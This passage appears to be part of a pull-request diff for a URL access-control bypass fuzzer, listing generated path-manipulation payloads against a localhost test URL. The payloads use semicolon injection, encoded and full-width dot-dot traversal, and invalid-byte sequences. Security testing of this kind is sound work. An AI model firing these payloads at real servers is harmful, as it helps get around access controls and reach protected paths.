http://127.0.0.1:8000/foo/;/bar +[mid_paths] http://127.0.0.1:8000/foo/;/。。%2f/bar +[mid_paths] http://127.0.0.1:8000/foo/;/。。/bar +[mid_paths] http://127.0.0.1:8000/foo/;/。。bar [mid_paths] http://127.0.0.1:8000/foo/;?bar [mid_paths] http://127.0.0.1:8000/foo/;bar +[mid_paths] http://127.0.0.1:8000/foo/;foo=bar/bar [mid_paths] http://127.0.0.1:8000/foo/;x/bar [mid_paths] http://127.0.0.1:8000/foo/;x;bar [mid_paths] http://127.0.0.1:8000/foo/;xbar @@ -3649,12 +3732,21 @@ Bypasser has generated 3658 payloads for 'http://127.0.0.1:8000/foo/bar' url: [mid_paths] http://127.0.0.1:8000/foo/??bar [mid_paths] http://127.0.0.1:8000/foo/?bar [mid_paths] http://127.0.0.1:8000/foo/\..\.\bar +[mid_paths] http://127.0.0.1:8000/foo/\xFF\x2E\xFF\x2Ebar [mid_paths] http://127.0.0.1:8000/foo/x;/%2e%2e/bar [mid_paths] http://127.0.0.1:8000/foo/x;/%2e%2ebar [mid_paths] http://127.0.0.1:8000/foo/x;/../bar [mid_paths] http://127.0.0.1:8000/foo/x;/..bar +[mid_paths] http://127.0.0.1:8000/foo/x;/。。bar +[mid_paths] http://127.0.0.1:8000/foo/。。%5cbar +[mid_paths] http://127.0.0.1:8000/foo/。。;bar +[mid_paths] http://127.0.0.1:8000/foo/�.�.bar [mid_paths] http://127.0.0.1:8000/x;/%2e%2e/foo/bar [mid_paths] http://127.0.0.1:8000/x;/%2e%2efoo/bar [mid_paths] http://127.0.0.1:8000/x;/../foo/bar [mid_paths] http://127.0.0.1:8000/x;/..foo/bar +[mid_paths] http://127.0.0.1:8000/x;/。。foo/bar +[mid_paths] http://127.0.0.1:8000/。。%5cfoo/bar +[mid_paths] http://127.0.0.1:8000/。。;foo/bar +[mid_paths] http://127.0.0.1:8000/�.�.foo/bar [original_request] http://127.0.0.1:8000/foo/bar
laluka
commented
10 months ago laluka
commented
10 months ago